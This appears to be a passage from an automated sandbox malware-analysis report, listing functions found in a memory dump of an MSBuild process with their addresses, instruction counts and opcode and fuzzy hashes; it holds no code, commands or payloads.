                                                                                                              • Instruction ID: e3b0c706506b02eec69debd6e210bd3f65cb7572d4f4c1b91193d26ce95309c2
                                                                                                              • Opcode Fuzzy Hash: 6dcd14458087724bcc4964453e46842a533a2c438687d7ef0ebcbe2a2a2270ca
                                                                                                              • Instruction Fuzzy Hash: 257104326046528FD32ADF2CC480B6AB7E5FF94314F0585A9E898CB352DB34DC56CB92
                                                                                                              Function 0119035C Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction ID: e6d9e5720068a7e1d400dca138c3f993f9816f3348586e253f5e5f72c8a74f4a
                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                              • Instruction Fuzzy Hash: 5C719C71A0021AEFDB18DFA9C980AEEBBB8FF48714F104469E515E7250DB34EA41CB90
                                                                                                              Function 011A62A0 Relevance: .2, Instructions: 198COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8ea8c77ed8cd4fe386c13b137cdb7339db0e3ea04da590f8317308d93817dab4
                                                                                                              • Instruction ID: 4886d97921e95d4c22d534b032f8e1f62796bde6757d290526c70e20661a67dd
                                                                                                              • Opcode Fuzzy Hash: 8ea8c77ed8cd4fe386c13b137cdb7339db0e3ea04da590f8317308d93817dab4
                                                                                                              • Instruction Fuzzy Hash: 3271F23A200B01EFE73ACF18C844F6ABFE6EF44724F594528E6168B2A0D775E945CB50
                                                                                                              Function 01118AA0 Relevance: .2, Instructions: 197COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 23731791ce2f295830244b8d980c0adca5a7b2e0fdc8ef2a40972ed246f4f1b0
                                                                                                              • Instruction ID: 1923d51aa7d70074f11134fb3a0f0b1bcd12e282cac63191be74b7c3ea3e397b
                                                                                                              • Opcode Fuzzy Hash: 23731791ce2f295830244b8d980c0adca5a7b2e0fdc8ef2a40972ed246f4f1b0
                                                                                                              • Instruction Fuzzy Hash: B881A172A083558FDB2DDF98D488B6DB7B1BB48314F16822DDA00AB386D774DD42CB94
                                                                                                              Function 011E8324 Relevance: .2, Instructions: 192COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0b918eb76004166ae994a55ea07eb1bc94ecc555c7bf2fbd63ead5c005eb65a7
                                                                                                              • Instruction ID: 60269386805f24c3e5bfe604b321c128ac9b0b4b39979fe64070e3edeb59eb57
                                                                                                              • Opcode Fuzzy Hash: 0b918eb76004166ae994a55ea07eb1bc94ecc555c7bf2fbd63ead5c005eb65a7
                                                                                                              • Instruction Fuzzy Hash: 1B710A72E00619EFDB1ADFD4C845FEEBBB9FF04354F104119EA20A6290E774AA45CB90
                                                                                                              Function 011CA250 Relevance: .2, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5d624003f3b118eb99c8c1ee2f2a6ad77a6d9a36a0fa6dec563d29c5656440f5
                                                                                                              • Instruction ID: f48ad3c27fd167dba18da202ac3f0ae6fb482804be5e0d3f93055474b98a5c66
                                                                                                              • Opcode Fuzzy Hash: 5d624003f3b118eb99c8c1ee2f2a6ad77a6d9a36a0fa6dec563d29c5656440f5
                                                                                                              • Instruction Fuzzy Hash: A951EF72504716AFD32ADE68D844A5BFBE9EFD4B14F050A2DBA80DB140E730ED04C7A2
                                                                                                              Function 011B8350 Relevance: .2, Instructions: 161COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34063682c37b80b24d377f412cc45c7e501fddfe77f91873770b8fba0ef395a1
                                                                                                              • Instruction ID: 3bfe94801b049fe2bc575b01e4afd39b693dafdf920ad37e0f6a379fbaee632e
                                                                                                              • Opcode Fuzzy Hash: 34063682c37b80b24d377f412cc45c7e501fddfe77f91873770b8fba0ef395a1
                                                                                                              • Instruction Fuzzy Hash: 2951AD70900705DBD729DF6AC8C0BABFBF8BF94B14F10461EE296576A0C7B0A945CB90
                                                                                                              Function 0114E443 Relevance: .2, Instructions: 158COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8e86f863971c9ff237a529cc189c52642352d3fc8c0754aee226a857bcf4768
                                                                                                              • Instruction ID: d75d714aafdb50551b750df17582c28baa1efc3aab189c3e446ddfd378f32905
                                                                                                              • Opcode Fuzzy Hash: b8e86f863971c9ff237a529cc189c52642352d3fc8c0754aee226a857bcf4768
                                                                                                              • Instruction Fuzzy Hash: 7651BE71201A15DFCB2AEF69C980E6AB3F9FF58B58F41042AE612C7260D738ED11CB50
                                                                                                              Function 011B4180 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d15659f6ad3155babcd77296e486e8dbd8330b724fd8f8d785d8fae9baeb4b5
                                                                                                              • Instruction ID: 873a5327cb90ce28f956878ac8595cf5f4e0bf7f8c49f34ad06aabfbed28e317
                                                                                                              • Opcode Fuzzy Hash: 2d15659f6ad3155babcd77296e486e8dbd8330b724fd8f8d785d8fae9baeb4b5
                                                                                                              • Instruction Fuzzy Hash: 16517C716083129FD758DF29D880AABBBE5FFC8208F48892DF596C7661E730D905CB52
                                                                                                              Function 011345B1 Relevance: .2, Instructions: 156COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction ID: 45a975604bfc414bd5c7f3bc125039b8fc5f77520441efe32d36cf18966970e2
                                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                                              • Instruction Fuzzy Hash: E651B171E0461AABDF1ADF98C440BFEBBB5AF85754F044069EA01AB344D734DD84CBA4
                                                                                                              Function 0119E9E0 Relevance: .2, Instructions: 154COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction ID: dedcadb76da948bc72cc3c4f68edd1eed5c0bc4a8601da80fc9aef028a3fc624
                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                              • Instruction Fuzzy Hash: C051B771D0221AEFEF29DF94C894BAEBB75AF00328F154665D93367290D7349E40CBA1
                                                                                                              Function 011D8B28 Relevance: .2, Instructions: 152COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b7e8ee31b15f0e44e79d2d962dbfeef00446b3c093b396259584312b51558cb6
                                                                                                              • Instruction ID: 0b20422eae489c2b261bbe5cc663ad8bcce3f8a75f06edf6563c47f696e060f2
                                                                                                              • Opcode Fuzzy Hash: b7e8ee31b15f0e44e79d2d962dbfeef00446b3c093b396259584312b51558cb6
                                                                                                              • Instruction Fuzzy Hash: FC41D371701611DBEB2DDB2DC894FBFBBAAEF90620F088219E955872C1DB34E801C791
                                                                                                              Function 0119CBF0 Relevance: .1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1a2bbc3c57afeb5188fac0edb1c35280fc3665e806b13279cbfbb63957edc4f
                                                                                                              • Instruction ID: 65e337a0a2e176a9c12eb53b2c7d7c7c1b9cfc611bb2ff9f02b093631c34278b
                                                                                                              • Opcode Fuzzy Hash: c1a2bbc3c57afeb5188fac0edb1c35280fc3665e806b13279cbfbb63957edc4f
                                                                                                              • Instruction Fuzzy Hash: 4051BC7190021ADFCF28DFA8D880A9EBBF9FF48358B114619D5A5A3705E734AE01CBD0
                                                                                                              Function 011DA9D3 Relevance: .1, Instructions: 139COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction ID: 7465231bdad5afe420f433d5e1fa2e8c786faac28d133f5ba433f76a4f7f09c8
                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                              • Instruction Fuzzy Hash: 97412B326007169FCB2DCF68D880A6AB7A9FF80314B05472EE95687640EB30FC14C7D2
                                                                                                              Function 011401F8 Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 384bbfe47429fc93d931f22398c7a5a106d9d41c16bd3f61e2ed04f5827986f0
                                                                                                              • Instruction ID: 9ac86778634d41835dd9798afdaabad4b1ce5dbb7620663727c0319b2920e4e2
                                                                                                              • Opcode Fuzzy Hash: 384bbfe47429fc93d931f22398c7a5a106d9d41c16bd3f61e2ed04f5827986f0
                                                                                                              • Instruction Fuzzy Hash: E441BD35900219DBDB18DF9AC440AEEBBB4BF4CB14F15812AFA15EB380E7359C41CBA5
                                                                                                              Function 0113EBFC Relevance: .1, Instructions: 138COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6727d522e93488585218718afc1086705bc4e2ecd13cd4eb4ba18c943ed2cf67
                                                                                                              • Instruction ID: bc7713059376f1c2592268b203739464d32061fe9174cd3212d1dbdc6358f77c
                                                                                                              • Opcode Fuzzy Hash: 6727d522e93488585218718afc1086705bc4e2ecd13cd4eb4ba18c943ed2cf67
                                                                                                              • Instruction Fuzzy Hash: 7541C1712053029FDB29DF28C884A5FB7F9FF88228F014929E566C371AEB35E8558B51
                                                                                                              Function 01152750 Relevance: .1, Instructions: 137COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction ID: 2215b032262f19eeb78765eb44459448d5d956ddc8c50679938e63ca37637b9d
                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                              • Instruction Fuzzy Hash: A5514975A00615CFDB19DF9CC480AAEF7B2FF84710F2881AAD915A7351D774AE42CB90
                                                                                                              Function 01116154 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d1da851a06e05d43ac24f70cf47c0ca84467c832066706629fec41ed6fdd5056
                                                                                                              • Instruction ID: ea1affd0df0b6c85a8041b33fa658e712392d91d8764882fadd6c4a5e44db4ec
                                                                                                              • Opcode Fuzzy Hash: d1da851a06e05d43ac24f70cf47c0ca84467c832066706629fec41ed6fdd5056
                                                                                                              • Instruction Fuzzy Hash: E651E770900216DBDB2ECB28CC04BE9BBB1FF15318F1482B9E529A72D5E7759991CF41
                                                                                                              Function 01110BCD Relevance: .1, Instructions: 130COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a0139a0534e7e0b9fdb8f585fa47cd07ace647727c136e588f4441818b0b1153
                                                                                                              • Instruction ID: ca9c87786170c9dff0b236218eab497280335e82aed4f626baeed587189f5d4f
                                                                                                              • Opcode Fuzzy Hash: a0139a0534e7e0b9fdb8f585fa47cd07ace647727c136e588f4441818b0b1153
                                                                                                              • Instruction Fuzzy Hash: A741AE35E01228DBDB29DF6CC940BEEB7B8AF59750F0101A5E908AB241DB359E81CF91
                                                                                                              Function 011D866E Relevance: .1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction ID: 265950bdb6f3b4d9156cc2352433de4976b333e454a0dab2869444f3f5c125b8
                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                              • Instruction Fuzzy Hash: CD41D575B00206ABEB1DDF99CC84ABFBBBAAF88714F154069E904A7341DB70DD01C7A0
                                                                                                              Function 01110887 Relevance: .1, Instructions: 128COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2e7a199a2a0a6f11aadc3186ab1c8bcb3cdc54a138a8fbd22b821e21c1f05ae5
                                                                                                              • Instruction ID: fb847be1bbe6b947f802524224750e0d82ca4a1fa129174bd9c775208802e23b
                                                                                                              • Opcode Fuzzy Hash: 2e7a199a2a0a6f11aadc3186ab1c8bcb3cdc54a138a8fbd22b821e21c1f05ae5
                                                                                                              • Instruction Fuzzy Hash: 5E41B270A007069FE72DCF28C490A26F7F9FF49214B108A7DE55A87A59F731E895CB90
                                                                                                              Function 0113A470 Relevance: .1, Instructions: 127COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3df456bbab66db6e1b2bb97c2f261a0492021c8a3b260735f408030f2bc756c1
                                                                                                              • Instruction ID: f0c9663fefea141a6bbe537b7f21d07e5f03dc8756fcfdbd77a532d7ef0382be
                                                                                                              • Opcode Fuzzy Hash: 3df456bbab66db6e1b2bb97c2f261a0492021c8a3b260735f408030f2bc756c1
                                                                                                              • Instruction Fuzzy Hash: 3D41DF32A00204CFDB2EEF68E8587AD7BF0BF98314F454299D551A72D9DB359900CBA1
                                                                                                              Function 01118BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b75b017216bddd8693bd36b3437303492ba6c723608d27c4d3767aa3a6baf306
                                                                                                              • Instruction ID: 00dd5cbb56d913593c418ca2ef834acfe29a41429fda19ede54ef0dd6496421c
                                                                                                              • Opcode Fuzzy Hash: b75b017216bddd8693bd36b3437303492ba6c723608d27c4d3767aa3a6baf306
                                                                                                              • Instruction Fuzzy Hash: B541F631904242CBD72DAF58D888B9EFBB5FB94708F15C12DD6015B25AD775D842CB90
                                                                                                              Function 01108918 Relevance: .1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7364239c0751630a700334f3e0e70ba3c52328ea99a14a58b54ca07061ca50c2
                                                                                                              • Instruction ID: 3613b1c8e811c59ad85e134633de027abba12af85476f6182fedafa2bd209ab8
                                                                                                              • Opcode Fuzzy Hash: 7364239c0751630a700334f3e0e70ba3c52328ea99a14a58b54ca07061ca50c2
                                                                                                              • Instruction Fuzzy Hash: 82417C3190C7069ED316EF68C840A6BF7E9AF88B54F41092AF980D7290E771DE158B93
                                                                                                              Function 0110A020 Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction ID: 88be67e33a67d6030dc47b88e62433407a6c6752072afe4758d77230231b7ca9
                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                              • Instruction Fuzzy Hash: 7A414931F08319DBEB1EEF1894407BABB65EF50754F1680AAE944CB285D7738D50CB92
                                                                                                              Function 011109AD Relevance: .1, Instructions: 122COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fe7d8cdaaecbb95965b8cf08c40123dfd1ab950b0095b2f9d0b7a88eb33ea4ad
                                                                                                              • Instruction ID: cfa4ed8f3e197b6cc49470c481f12d8e3d61392fe56e797e1a441cacc675b314
                                                                                                              • Opcode Fuzzy Hash: fe7d8cdaaecbb95965b8cf08c40123dfd1ab950b0095b2f9d0b7a88eb33ea4ad
                                                                                                              • Instruction Fuzzy Hash: 4F417D72A00601DFD729CF18D840B26FBF5FF58314F21866AE4498B255E771E981CB91
                                                                                                              Function 01140710 Relevance: .1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction ID: 13fe96060488ca749f103dc674e6e6f772304c98a9c71cb6d6efec9cd3e098e8
                                                                                                              • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                              • Instruction Fuzzy Hash: 96415E71A00705EFDB28CF99C980AAABBF4FF18B00B11496DE696D7651E330EA44CF51
                                                                                                              Function 0111262C Relevance: .1, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b964d9c5835254a3188181eb553b644f262bb17b0b26ebc096f51d3d4bbe8416
                                                                                                              • Instruction ID: 5b2f6b744595779ff11ecb2d330ee9d2a72ed9462eea4d2ce83a2a5f0bc2115f
                                                                                                              • Opcode Fuzzy Hash: b964d9c5835254a3188181eb553b644f262bb17b0b26ebc096f51d3d4bbe8416
                                                                                                              • Instruction Fuzzy Hash: E141B071901B05CFCB2EEF28D900B5AF7B5FF58314F2186A9C4169B6A6DB309941CB51
                                                                                                              Function 0114C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a13690e77a79ae3b87ecdaa0b2a96da9140bcd2870db49b0be9429f7308fa7d5
                                                                                                              • Instruction ID: 834502bbc0dd0f7396f6cf963bd28873af835d8de64247b27607c2a16a076e1f
                                                                                                              • Opcode Fuzzy Hash: a13690e77a79ae3b87ecdaa0b2a96da9140bcd2870db49b0be9429f7308fa7d5
                                                                                                              • Instruction Fuzzy Hash: DF319EB2A01755DFDB19DF98C440799BBF0FB09B18F2085AED119EB251E7369902CF90
                                                                                                              Function 011907C3 Relevance: .1, Instructions: 114COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1327390f47f5aae6fabbb29503db14a8e6cb92d0296a32ef709c5e3291a06b8f
                                                                                                              • Instruction ID: 37a2ec1c17558fffdd7befaf469d6f92927479fe56f562734eadad98b391099a
                                                                                                              • Opcode Fuzzy Hash: 1327390f47f5aae6fabbb29503db14a8e6cb92d0296a32ef709c5e3291a06b8f
                                                                                                              • Instruction Fuzzy Hash: 95419071A043059FD764DF29C845B9BBBE8FF88764F004A2EF9A8C7251D7709904CB92
                                                                                                              Function 011080A0 Relevance: .1, Instructions: 111COMMON
